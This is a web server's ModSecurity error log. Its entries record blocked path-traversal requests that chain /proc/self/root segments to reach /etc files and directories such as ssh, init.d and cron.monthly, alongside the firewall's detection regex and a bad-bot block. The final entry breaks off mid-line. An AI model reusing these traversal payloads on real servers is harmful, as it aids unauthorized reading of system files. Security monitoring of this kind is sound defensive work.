[Tue Mar 17 09:38:40.746951 2026] [:error] [pid 1210:tid 140411540502272] [client 74.7.243.203:47216] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLUFKJy4A1bGlmj9BWoAAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:38:46.382448 2026] [:error] [pid 7437:tid 140411616036608] [client 74.7.243.203:56784] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLVgeiSKl8TjouI-YDKQAAA88"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:38:57.583792 2026] [:error] [pid 1210:tid 140411733534464] [client 74.7.228.16:40560] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablLYVKJy4A1bGlmj9BWogAAAkE"]
[Tue Mar 17 09:39:54.531491 2026] [:error] [pid 11469:tid 140411674785536] [client 74.7.241.46:35208] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLmpDEJR9VXonE_-1QUAAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:40:07.411583 2026] [:error] [pid 2553:tid 140411716749056] [client 74.7.241.46:50214] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLp_0Bec_B9OkZP_i-SAAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:40:40.919384 2026] [:error] [pid 1210:tid 140411741927168] [client 74.7.241.46:60602] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLyFKJy4A1bGlmj9BW4gAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:40:45.419599 2026] [:error] [pid 2159:tid 140411616036608] [client 74.7.241.46:54998] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablLzfct6CQ8jnRyg2p9aQAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:40:56.893527 2026] [:error] [pid 11469:tid 140411741927168] [client 74.7.241.46:55004] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablL2JDEJR9VXonE_-1QbwAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:40:57.943195 2026] [:error] [pid 2553:tid 140411624429312] [client 74.7.243.203:34354] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablL2f0Bec_B9OkZP_i-cAAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:41:09.497089 2026] [:error] [pid 1016:tid 140411674785536] [client 74.7.243.203:60364] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablL5ZqmL8PQht4WJFlJdAAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:41:22.073855 2026] [:error] [pid 11469:tid 140411691570944] [client 74.7.241.46:50080] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablL8pDEJR9VXonE_-1QkQAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:41:23.801137 2026] [:error] [pid 1210:tid 140411624429312] [client 74.7.243.203:37930] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablL81KJy4A1bGlmj9BW-wAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:41:34.621090 2026] [:error] [pid 1731:tid 140411649607424] [client 74.7.241.46:42732] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablL_gb2qCuy5irgBMjKhQAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:41:51.174756 2026] [:error] [pid 11293:tid 140411708356352] [client 74.7.241.46:39328] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMD9CmCSWTlPouqorNNwAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:41:53.577511 2026] [:error] [pid 2159:tid 140411699963648] [client 74.7.241.46:37016] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMEfct6CQ8jnRyg2p9gwAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:41:59.298275 2026] [:error] [pid 2473:tid 140411741927168] [client 74.7.243.203:46498] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMFqBJNF7axNlVR0X-IQAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:42:16.311058 2026] [:error] [pid 1210:tid 140411624429312] [client 74.7.243.203:56238] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMKFKJy4A1bGlmj9BXKwAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:42:49.311270 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.241.46:37020] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMSQeiSKl8TjouI-YDrwAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:42:51.695585 2026] [:error] [pid 11293:tid 140411599251200] [client 74.7.241.46:40480] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMS9CmCSWTlPouqorNVgAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:42:56.627490 2026] [:error] [pid 2159:tid 140411741927168] [client 74.7.241.46:40482] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMUPct6CQ8jnRyg2p9nQAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:43:20.226061 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.244.31:45250] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablMaAeiSKl8TjouI-YDwgAAA8o"]
[Tue Mar 17 09:43:22.359745 2026] [:error] [pid 11469:tid 140411674785536] [client 74.7.241.46:60420] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMapDEJR9VXonE_-1Q3gAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:43:30.460443 2026] [:error] [pid 1016:tid 140411649607424] [client 74.7.243.203:35320] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablMcpqmL8PQht4WJFlJ9QAAAUs"], referer: 